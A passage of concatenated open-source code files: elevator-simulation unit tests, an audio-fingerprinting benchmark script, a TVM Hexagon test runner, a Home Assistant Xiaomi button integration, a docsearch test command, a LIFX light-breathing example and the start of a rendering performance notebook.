test_elevator._current_position = 8.0
test_elevator._target_floors = [3, 5]
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._loaded_person[2].append(
PersonType(6, 40, 1, 3, world.raw_time))
test_elevator._loaded_person[4].append(
PersonType(7, 35, 1, 5, world.raw_time))
test_elevator._load_weight = 80
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
ret_person.append(PersonType(0, 50, 3, 5, world.raw_time))
ret_person.append(PersonType(1, 30, 3, 1, world.raw_time))
ret_person.append(PersonType(2, 60, 6, 4, world.raw_time))
ret_person.append(PersonType(4, 55, 3, 4, world.raw_time))
ret_person.append(PersonType(5, 65, 3, 6, world.raw_time))
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(3, 1))
test_mansion.run_mansion(dispatch)
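# run_mansion() advances the simulation by one dt (0.5 s) per call, so the
# door is half open after one step and fully open after the next.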
# print(test_mansion.state, "\nworld time is", world.raw_time)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 0.5)
# mock generate_person again
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion.run_mansion(dispatch) # Door fully open, t = 1.0
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 1.0)
for i in range(4):
test_mansion.run_mansion(dispatch)
# print(test_mansion.state, "\nworld time is", world.raw_time)
state = test_mansion.state # passenger 6 is unloaded, t = 3.0
self.assertAlmostEqual(state.ElevatorStates[0].LoadWeight, 40)
dispatch = []
dispatch.append(ElevatorAction(0, 0))
for i in range(4):
test_mansion.run_mansion(dispatch)
# print(test_mansion.state, "\nworld time is", world.raw_time)
state = test_mansion.state # passenger 0 and 4 are loaded, t = 5.0
self.assertAlmostEqual(state.ElevatorStates[0].LoadWeight, 145)
for i in range(4):
test_mansion.run_mansion(dispatch)
state = test_mansion.state # passenger 5 is loaded, t = 7.0
self.assertAlmostEqual(state.ElevatorStates[0].LoadWeight, 210)
for i in range(4):
test_mansion.run_mansion(dispatch)
# print(test_mansion.state, "\nworld time is", world.raw_time)
state = test_mansion.state # the door is closed, going up, t = 9.0
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 1.0)
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_overload(self, mock_uniformgenerator):
"""
overload, two people enter together, check who can enter the elevator one by one
after overload, if the dispatcher still dispatches the elevator to the current floor, ignore the dispatch
"""
max_floors = 8
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0)
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 1
test_elevator._current_position = 8.0
test_elevator._target_floors = [5]
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._loaded_person[5].append(
PersonType(6, 750, 1, 6, world.raw_time))
test_elevator._loaded_person[7].append(
PersonType(7, 750, 1, 8, world.raw_time))
test_elevator._load_weight = 1500
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
ret_person.append(PersonType(0, 150, 3, 5, world.raw_time))
ret_person.append(PersonType(1, 50, 3, 1, world.raw_time))
ret_person.append(PersonType(2, 60, 5, 6, world.raw_time))
ret_person.append(PersonType(4, 65, 3, 8, world.raw_time))
ret_person.append(PersonType(5, 65, 3, 6, world.raw_time))
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(3, 1))
test_mansion.run_mansion(dispatch)
# mock generate_person again
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion.run_mansion(dispatch) # Door fully open, t = 1.0
dispatch = []
dispatch.append(ElevatorAction(-1, 0))
for i in range(4):
test_mansion.run_mansion(dispatch) # upload person 4, t = 3.0
dispatch = []
dispatch.append(ElevatorAction(3, 1))
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].LoadWeight, 1565)
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch) # t = 4.5
state = test_mansion.state
self.assertGreater(state.ElevatorStates[0].Velocity, 0.0)
# print(test_mansion.state, "\nworld time is", world.raw_time)
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_stop_at_dispatch(self, mock_uniformgenerator):
"""
stop at the dispatch floor, open and close the door, then keep going to the target floor
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 1
test_elevator._current_velocity = 2.0
test_elevator._current_position = 4.0 # currently at 2 floor
test_elevator._target_floors = [5]
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._loaded_person[5].append(
PersonType(0, 50, 1, 6, world.raw_time))
test_elevator._load_weight = 50
# test_mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
# test
dispatch = []
dispatch.append(ElevatorAction(3, 1))
for i in range(7):
test_mansion.run_mansion(dispatch) # stop at the dispatched floor
# print(test_mansion.state, "\nworld time is", world.raw_time)
# dispatch = []
# dispatch.append(ElevatorAction(-1, 0))
for i in range(2):
# the door is fully open, t = 4.5
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 1.0)
dispatch = []
dispatch.append(ElevatorAction(0, 0))
for i in range(6):
# finish time open lag and close the door
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 0.0)
for i in range(4):
test_mansion.run_mansion(dispatch) # then keep going up
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 2.0)
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_dispatch_when_closing(self, mock_uniformgenerator):
"""
dispatch the current floor when the door is closing
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 1
test_elevator._current_position = 8.0
test_elevator._target_floors = [4, 5]
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._loaded_person[3].append(
PersonType(6, 40, 1, 4, world.raw_time))
test_elevator._loaded_person[4].append(
PersonType(7, 40, 1, 5, world.raw_time))
test_elevator._load_weight = 80
# test_mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
ret_person.append(PersonType(0, 50, 3, 5, world.raw_time))
ret_person.append(PersonType(1, 50, 3, 1, world.raw_time))
ret_person.append(PersonType(2, 60, 6, 4, world.raw_time))
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(3, 1))
# run_mansion
test_mansion.run_mansion(dispatch)
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion.run_mansion(dispatch) # the door is open, t = 1.0
# print(test_mansion.state, "\nworld time is", world.raw_time)
dispatch = []
dispatch.append(ElevatorAction(-1, 0))
for i in range(4):
test_mansion.run_mansion(dispatch) # load person 0, t = 3.0
# the door is closing, the door state = 0.5, t = 3.5
test_mansion.run_mansion(dispatch)
# come two more passengers
ret_person = []
ret_person.append(PersonType(4, 55, 3, 4, world.raw_time))
ret_person.append(PersonType(5, 65, 3, 6, world.raw_time))
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
dispatch = []
dispatch.append(ElevatorAction(3, 1))
# the door is open, door_state = 1.0, time = 4.0
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 1.0)
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
dispatch = []
dispatch.append(ElevatorAction(-1, 0))
for i in range(4):
test_mansion.run_mansion(dispatch) # load the two passengers
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].LoadWeight, 250)
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_dispatch_invalid(self, mock_uniformgenerator):
"""
ignore the invalid dispatch (cannot stop at the dispatch)
and decelerate when needed (test velocity_planner)
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0
)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_eleavtor")
test_elevator._direction = 1
test_elevator._current_velocity = 2.0
test_elevator._current_position = 8.0 # currently at 3 floor
test_elevator._target_floors = [5, 8] # target 5 floor
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._loaded_person[4].append(
PersonType(6, 40, 1, 5, world.raw_time))
test_elevator._loaded_person[7].append(
PersonType(7, 40, 1, 8, world.raw_time))
test_elevator._load_weight = 80
# test_mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(3, 1))
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 2.0)
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(
state.ElevatorStates[0].Velocity,
2.0) # ignore the invalid dispatch
for i in range(5):
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 0.0)
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_no_dispatch(self, mock_uniformgenerator):
"""
arrive at the target, no dispatch, hold still
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0
)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_eleavtor")
test_elevator._direction = 1
test_elevator._current_velocity = 0
test_elevator._current_position = 8.0 # currently at 3 floor
test_elevator._target_floors = [3] # target 3 floor
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._loaded_person[2].append(
PersonType(0, 40, 1, 3, world.raw_time))
test_elevator._load_weight = 40
# test_mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(-1, 0))
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch) # open the door
for i in range(4):
test_mansion.run_mansion(dispatch) # unload person 0
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch) # close the door
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 0.0)
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 0.0)
self.assertAlmostEqual(state.ElevatorStates[0].Floor, 3.0)
self.assertAlmostEqual(state.ElevatorStates[0].Direction, 0)
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_dispatch_twice(self, mock_uniformgenerator):
"""
no target, dispatch (3, 1) first, then (8, -1)
decelerate then accelerate
not accelerate immediately
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0
)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 1
test_elevator._current_velocity = 2.0
test_elevator._current_position = 9.0
test_elevator._target_floors = list()
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._load_weight = 0
# mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
# first, dispatch to 8 floor
dispatch = []
dispatch.append(ElevatorAction(4, 1))
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch)
dispatch = []
dispatch.append(ElevatorAction(8, -1))
test_mansion.run_mansion(dispatch) # accelerate at once
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 2.0)
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_cancel_dispatch(self, mock_uniformgenerator):
"""
no target, dispatch first, accelerate, then cancel dispatch, decelerate
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0
)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 0
test_elevator._current_velocity = 0.0
test_elevator._current_position = 8.0
test_elevator._target_floors = list()
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._load_weight = 0
# mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(6, 1))
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch) # t = 1.0
dispatch = []
dispatch.append(ElevatorAction(0, -1))
for i in range(10):
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 0.0)
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 0.0)
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_set_direction_0(self, mock_uniformgenerator):
"""
When the elevator is stopped and empty, always set direction as 0 first,
then set as dispatch_target_direction
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0
)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 1
test_elevator._current_velocity = 0.0
test_elevator._current_position = 8.0 # 3rd floor
test_elevator._target_floors = list()
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._load_weight = 0
# mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
ret_person.append(PersonType(0, 50, 3, 1, world.raw_time))
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(3, -1))
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch) # t = 1.0
# print(test_mansion.state, "\nworld time is", world.raw_time)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].Direction, -1)
if __name__ == '__main__':
unittest.main()
|
run_tests.py | datafaust/dejavu | 4,591 | 12609938 | import argparse
import logging
import time
from os import makedirs
from os.path import exists, join
from shutil import rmtree
import matplotlib.pyplot as plt
import numpy as np
from dejavu.tests.dejavu_test import (DejavuTest, autolabeldoubles,
generate_test_files, log_msg, set_seed)
def main(seconds: int, results_folder: str, temp_folder: str, log: bool, silent: bool,
log_file: str, padding: int, seed: int, src: str):
# set random seed if set by user
set_seed(seed)
# ensure results folder exists
if not exists(results_folder):
makedirs(results_folder)
# set logging
if log:
logging.basicConfig(filename=log_file, level=logging.DEBUG)
# set test seconds
test_seconds = [f'{i}sec' for i in range(1, seconds + 1, 1)]
# generate testing files
for i in range(1, seconds + 1, 1):
generate_test_files(src, temp_folder, i, padding=padding)
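# One set of query snippets is generated per test length (1..seconds);
# --padding constrains where within each source file the snippet is taken from.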
# scan files
log_msg(f"Running Dejavu fingerprinter on files in {src}...", log=log, silent=silent)
tm = time.time()
djv = DejavuTest(temp_folder, test_seconds)
log_msg(f"finished obtaining results from dejavu in {(time.time() - tm)}", log=log, silent=silent)
tests = 1 # djv
n_secs = len(test_seconds)
# set result variables -> 3-level nested lists
all_match_counter = [[[0 for x in range(tests)] for x in range(3)] for x in range(n_secs)]
all_matching_times_counter = [[[0 for x in range(tests)] for x in range(2)] for x in range(n_secs)]
all_query_duration = [[[0 for x in range(tests)] for x in range(djv.n_lines)] for x in range(n_secs)]
all_match_confidence = [[[0 for x in range(tests)] for x in range(djv.n_lines)] for x in range(n_secs)]
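# Each of these nested lists is indexed [test second][bucket or line][tool];
# with only dejavu under test the innermost dimension has length 1.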
# group results by seconds
for line in range(0, djv.n_lines):
for col in range(0, djv.n_columns):
# for dejavu
all_query_duration[col][line][0] = djv.result_query_duration[line][col]
all_match_confidence[col][line][0] = djv.result_match_confidence[line][col]
djv_match_result = djv.result_match[line][col]
if djv_match_result == 'yes':
all_match_counter[col][0][0] += 1
elif djv_match_result == 'no':
all_match_counter[col][1][0] += 1
else:
all_match_counter[col][2][0] += 1
djv_match_acc = djv.result_matching_times[line][col]
if djv_match_acc == 0 and djv_match_result == 'yes':
all_matching_times_counter[col][0][0] += 1
elif djv_match_acc != 0:
all_matching_times_counter[col][1][0] += 1
# create plots
djv.create_plots('Confidence', all_match_confidence, results_folder)
djv.create_plots('Query duration', all_query_duration, results_folder)
for sec in range(0, n_secs):
ind = np.arange(3)
width = 0.25 # the width of the bars
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xlim([-1 * width, 2.75])
means_dvj = [round(x[0] * 100 / djv.n_lines, 1) for x in all_match_counter[sec]]
rects1 = ax.bar(ind, means_dvj, width, color='r')
# add axis labels, title and tick labels
ax.set_ylabel('Matching Percentage')
ax.set_title(f'{test_seconds[sec]} Matching Percentage')
ax.set_xticks(ind + width)
labels = ['yes', 'no', 'invalid']
ax.set_xticklabels(labels)
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.75, box.height])
autolabeldoubles(rects1, ax)
plt.grid()
fig_name = join(results_folder, f"matching_perc_{test_seconds[sec]}.png")
fig.savefig(fig_name)
for sec in range(0, n_secs):
ind = np.arange(2)
width = 0.25 # the width of the bars
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xlim([-1 * width, 1.75])
div = all_match_counter[sec][0][0]
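        # guard against division by zero when no query of this length matched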
if div == 0:
div = 1000000
means_dvj = [round(x[0] * 100 / div, 1) for x in all_matching_times_counter[sec]]
rects1 = ax.bar(ind, means_dvj, width, color='r')
        # add axis labels, title and tick labels
ax.set_ylabel('Matching Accuracy')
ax.set_title(f'{test_seconds[sec]} Matching Times Accuracy')
ax.set_xticks(ind + width)
labels = ['yes', 'no']
ax.set_xticklabels(labels)
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.75, box.height])
autolabeldoubles(rects1, ax)
plt.grid()
fig_name = join(results_folder, f"matching_acc_{test_seconds[sec]}.png")
fig.savefig(fig_name)
# remove temporary folder
rmtree(temp_folder)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=f'Runs a few tests for dejavu to evaluate '
f'its configuration performance. '
                                     f'Usage: %(prog)s [options] TESTING_AUDIOFOLDER'
)
parser.add_argument("-sec", "--seconds", action="store", default=5, type=int,
help='Number of seconds starting from zero to test.')
parser.add_argument("-res", "--results-folder", action="store", default="./dejavu_test_results",
help='Sets the path where the results are saved.')
parser.add_argument("-temp", "--temp-folder", action="store", default="./dejavu_temp_testing_files",
help='Sets the path where the temp files are saved.')
parser.add_argument("-l", "--log", action="store_true", default=False, help='Enables logging.')
    parser.add_argument("-sl", "--silent", action="store_true", default=False, help='Disables printing.')
parser.add_argument("-lf", "--log-file", default="results-compare.log",
help='Set the path and filename of the log file.')
parser.add_argument("-pad", "--padding", action="store", default=10, type=int,
help='Number of seconds to pad choice of place to test from.')
parser.add_argument("-sd", "--seed", action="store", default=None, type=int, help='Random seed.')
parser.add_argument("src", type=str, help='Source folder for audios to use as tests.')
args = parser.parse_args()
main(args.seconds, args.results_folder, args.temp_folder, args.log, args.silent, args.log_file, args.padding,
args.seed, args.src)
|
tests/python/contrib/test_hexagon/test_run_unit_tests.py | shengxinhu/tvm | 4,640 | 12609939 | <filename>tests/python/contrib/test_hexagon/test_run_unit_tests.py<gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import pytest
import numpy as np
import tvm
from tvm.contrib.hexagon.session import Session
# use pytest -sv to observe gtest output
# use --gtest_args to pass arguments to gtest
# for example to run all "foo" tests twice and observe gtest output run
# pytest -sv <this file> --gtests_args="--gtest_filter=*foo* --gtest_repeat=2"
@tvm.testing.requires_hexagon
def test_run_unit_tests(hexagon_session: Session, gtest_args):
try:
func = hexagon_session._rpc.get_function("hexagon.run_unit_tests")
    except Exception:
print(
"This test requires TVM Runtime to be built with a Hexagon gtest version using Hexagon API cmake flag -DUSE_HEXAGON_GTEST=/path/to/hexagon/sdk/utils/googletest/gtest"
)
raise
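    # the RPC function returns the gtest exit code on the first line, followed by the captured gtest output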
gtest_error_code_and_output = func(gtest_args)
gtest_error_code = int(gtest_error_code_and_output.splitlines()[0])
gtest_output = gtest_error_code_and_output.split("\n", 1)[-1]
print(gtest_output)
np.testing.assert_equal(gtest_error_code, 0)
|
homeassistant/components/xiaomi_miio/button.py | MrDelik/core | 30,023 | 12609955 | """Support for Xiaomi buttons."""
from __future__ import annotations
from dataclasses import dataclass
from typing import Any
from homeassistant.components.button import (
ButtonDeviceClass,
ButtonEntity,
ButtonEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_MODEL
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import EntityCategory
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import (
DOMAIN,
KEY_COORDINATOR,
KEY_DEVICE,
MODEL_AIRFRESH_A1,
MODEL_AIRFRESH_T2017,
)
from .device import XiaomiCoordinatedMiioEntity
ATTR_RESET_DUST_FILTER = "reset_dust_filter"
ATTR_RESET_UPPER_FILTER = "reset_upper_filter"
@dataclass
class XiaomiMiioButtonDescription(ButtonEntityDescription):
"""A class that describes button entities."""
method_press: str = ""
method_press_error_message: str = ""
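    # method_press names the device method invoked when the button is pressed;
    # method_press_error_message is the message used if that call fails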
BUTTON_TYPES = (
XiaomiMiioButtonDescription(
key=ATTR_RESET_DUST_FILTER,
name="Reset Dust Filter",
icon="mdi:air-filter",
method_press="reset_dust_filter",
method_press_error_message="Resetting the dust filter lifetime failed",
entity_category=EntityCategory.CONFIG,
),
XiaomiMiioButtonDescription(
key=ATTR_RESET_UPPER_FILTER,
name="Reset Upper Filter",
icon="mdi:air-filter",
method_press="reset_upper_filter",
method_press_error_message="Resetting the upper filter lifetime failed.",
entity_category=EntityCategory.CONFIG,
),
)
MODEL_TO_BUTTON_MAP: dict[str, tuple[str, ...]] = {
MODEL_AIRFRESH_A1: (ATTR_RESET_DUST_FILTER,),
MODEL_AIRFRESH_T2017: (
ATTR_RESET_DUST_FILTER,
ATTR_RESET_UPPER_FILTER,
),
}
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the button from a config entry."""
model = config_entry.data[CONF_MODEL]
if model not in MODEL_TO_BUTTON_MAP:
return
entities = []
buttons = MODEL_TO_BUTTON_MAP[model]
unique_id = config_entry.unique_id
device = hass.data[DOMAIN][config_entry.entry_id][KEY_DEVICE]
coordinator = hass.data[DOMAIN][config_entry.entry_id][KEY_COORDINATOR]
for description in BUTTON_TYPES:
if description.key not in buttons:
continue
entities.append(
XiaomiGenericCoordinatedButton(
f"{config_entry.title} {description.name}",
device,
config_entry,
f"{description.key}_{unique_id}",
coordinator,
description,
)
)
async_add_entities(entities)
class XiaomiGenericCoordinatedButton(XiaomiCoordinatedMiioEntity, ButtonEntity):
"""A button implementation for Xiaomi."""
entity_description: XiaomiMiioButtonDescription
_attr_device_class = ButtonDeviceClass.RESTART
    def __init__(self, name, device, entry, unique_id, coordinator, description):
        """Initialize the button entity."""
super().__init__(name, device, entry, unique_id, coordinator)
self.entity_description = description
async def async_press(self, **kwargs: Any) -> None:
"""Press the button."""
method = getattr(self._device, self.entity_description.method_press)
await self._try_command(
self.entity_description.method_press_error_message,
method,
)
|
cli/src/commands/run_tests.py | erichiggins0/docsearch-scraper | 242 | 12609984 | <reponame>erichiggins0/docsearch-scraper
from .abstract_command import AbstractCommand
class RunTests(AbstractCommand):
def get_name(self):
return "test"
def get_description(self):
return "Run tests"
def get_options(self):
return [{"name": "docker",
"description": "run test from docker image",
"optional": False}]
@staticmethod
def docker_parse(args):
if len(args) < 2:
return False
if isinstance(args[1], bool):
return args[1]
        if args[1] == "no_browser":
return "no_browser"
return isinstance(args[1], str) and args[1].lower() == "true"
def run(self, args):
docker = self.get_option("docker", args)
if docker == True:
self.exec_shell_command(["./docsearch", "docker:build", "true"])
run_command = [
"docker",
"run",
"--rm",
"-i",
"--name",
"docsearch-scraper-test",
"-t",
"algolia/docsearch-scraper-test"]
return self.exec_shell_command(run_command)
test_command = ["pytest", "./scraper/src"]
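        # without a browser available, deselect tests whose names contain "_browser"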
if docker == "no_browser":
test_command.append("-k")
test_command.append("not _browser")
print(test_command)
return self.exec_shell_command(test_command)
|
examples/breathe_all.py | ceboxsell/LocalLifxLan | 464 | 12609986 | <reponame>ceboxsell/LocalLifxLan
#!/usr/bin/env python
# coding=utf-8
import sys
from copy import copy
from time import sleep, time
from lifxlan import LifxLAN
def main():
num_lights = None
if len(sys.argv) != 2:
print("\nDiscovery will go much faster if you provide the number of lights on your LAN:")
print(" python {} <number of lights on LAN>\n".format(sys.argv[0]))
else:
num_lights = int(sys.argv[1])
# instantiate LifxLAN client, num_lights may be None (unknown).
# In fact, you don't need to provide LifxLAN with the number of bulbs at all.
# lifx = LifxLAN() works just as well. Knowing the number of bulbs in advance
# simply makes initial bulb discovery faster.
lifx = LifxLAN(num_lights)
    # fetch and save the current power and color state so it can be restored later
print("Discovering lights...")
original_powers = lifx.get_power_all_lights()
original_colors = lifx.get_color_all_lights()
half_period_ms = 2500
duration_mins = 20
duration_secs = duration_mins*60
print("Breathing...")
try:
start_time = time()
while True:
for bulb in original_colors:
color = original_colors[bulb]
dim = list(copy(color))
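                # HSBK index 2 is brightness; lower it for the dim half of the breathe cycle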
dim[2] = 1900
bulb.set_color(dim, half_period_ms, rapid=True)
sleep(half_period_ms/1000.0)
for bulb in original_colors:
color = original_colors[bulb]
bulb.set_color(color, half_period_ms, rapid=True)
sleep(half_period_ms/1000.0)
if time() - start_time > duration_secs:
raise KeyboardInterrupt
except KeyboardInterrupt:
print("Restoring original color to all lights...")
for light in original_colors:
color = original_colors[light]
light.set_color(color)
print("Restoring original power to all lights...")
for light in original_powers:
power = original_powers[light]
light.set_power(power)
if __name__=="__main__":
main()
|
functest/perf_serial.py | Luvideria/lightmetrica-v3 | 101 | 12610000 | # ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Performance testing of serialization
#
# This test checks the performance improvement of scene setup with serialization feature.
import lmenv
env = lmenv.load('.lmenv')
import os
import imageio
import pandas as pd
import numpy as np
import timeit
# %matplotlib inline
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import lmscene
import lightmetrica as lm
# %load_ext lightmetrica_jupyter
lm.init()
lm.log.init('jupyter')
lm.progress.init('jupyter')
lm.info()
scene_names = lmscene.scenes_small()
scene_setup_time_df = pd.DataFrame(
